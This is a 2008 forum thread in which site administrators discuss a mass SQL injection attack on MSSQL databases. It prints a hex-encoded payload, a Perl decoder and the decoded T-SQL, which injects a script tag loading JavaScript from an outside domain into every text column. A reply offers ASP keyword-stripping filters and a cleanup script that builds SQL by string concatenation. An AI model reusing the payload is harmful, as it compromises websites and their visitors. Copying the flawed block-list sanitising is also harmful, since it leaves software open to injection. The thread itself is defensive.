    622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D2054
    61626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E2045584543282755504441
    5445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522838303030292C5B272B40432B275D2929
    2B27273C736372697074207372633D687474703A2F2F7777772E62616E6E657238322E636F6D2F622E6A733E3C2F7363726970743E27272729204645544348
    204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C
    4F43415445205461626C655F437572736F72
    EOF
    while (length($s)>0) {
      my $hex=substr($s,0,2); $s=substr($s,2,length($s));
      my $ch=hex($hex); $ch=pack("C",$ch);
      print $ch;

    }

    now decoded you notice that its what was in the wild

    DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(8000),['+@C+']))+''<script src=http://www.banner82.com/b.js></script>''') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

     the question is have they found a new way to inject without the declare or a way around dequoting the injection. i have a fealing its a new type of attack and they dont use a declare.

    i will sift through the logs and see what i can find but its hard when you have hundreds of sites and log files

     it would be great if someone could write a trigger for mssql so that anytime an update contains %<script etc.. it will tell me what site it came from. this would help out greatly as i can then pinpoint where it came from. maybe mssql-scan :)

     

  • Re: Anyone know about www.nihaorr1.com/1.js?

    Aug 25, 2008 10:38 PM|silkyfixer|LINK

    ok i have no idea but somehow the urlscan is not working i put in the statemets of your config and it still got infected today. there must be some way around the declare statement.

     is there any way to create a trigger on the mssql database to tell me what site the update injects the script code . since i never insert or update any of my tables with <script in it i think this will pinpoint were the attack is coming from.

     my urlscan shows it blocking declare and other random injections but it still gets infected. so i would assume they are no longer using a declare statement. or have a way around the declare statement.

    again over 500 sites connect to the same database so i have no idea how or where the injection comes from.

     i am not a coder so i would not know where or how to write a trigger to store in a log file where the injection came from.

     thank you

    silkyfixer

     

  • Re: Anyone know about www.nihaorr1.com/1.js?

    Aug 26, 2008 12:21 AM|silkyfixer|LINK

    problem is that i can dump all the logs and parse through them but i dont know what to look for since the urlscan kicks out the declare it must be something else.

     

    silkyfixer

  • Re: Anyone know about www.nihaorr1.com/1.js?

    Dec 12, 2008 09:14 PM|Paul Bishop|LINK

    this is an sql injection attack. you must remove the <script ..... to ...</script>

    it copies it self at the end of any text column it can.

    in asp

    <%

    function stripQuotes(strWords) stripQuotes = replace(strWords, "'", "''")

    end function

     

    function killChars(strWords)

    dim badChars

    dim newCharsbadChars = array("select ", "drop ", ";", "--", "insert ", "delete ", "xp_", " or ", "or ")

    newChars = strWords

    for i = 0 to uBound(badChars)

    newChars = replace(newChars, badChars(i), "")

    next

    killChars = newChars

    end function

    bco = stripQuotes(killChars(replace(request("bco"), "'", "")))

     

    %>

    you must use this on all requested data

    you must even use it on things like request server variables

    because the 1.js file link can be attached to os or ref server vars

    do it on the backend as well or textbox or chk box radio if your requesting it it can be attached no need to worry about session objects unless you request an element and assign it to a session object integers are not affected

    this is a sample script of how to remove from the db

    os is the text column

    <% response.Buffer=False %>

    <%

    Server.ScriptTimeout = 50000

    dim pida(4500000)

    dim descr(4500000)

    dim ldescr(4500000)

    SQLStmt = "SELECT osid, os From OS "

    Set RS = dbSubs.Execute(SQLStmt) do while checkrs(rs)

    if len(rs("os")) > 0 then

    pida(i) = rs("osid") descrx = replace(rs("os"), "<script src=http://17gamo.com/1.js></script>" ,"")

    descr(i) = replace(descrx, "'", "")

    i = I + 1

    end if

    rs.movenext

    loop for p = 0 to (i -1)

    response.Write pid & " " & descr(p) & "<br>"

     

    SQLStmt = "UPDATE OS SET os = '" & descr(p) & "' WHERE osid= '" & pida(p) & "' ; "

    Set RS = dbSubs.Execute(SQLStmt)

     

    next

    %>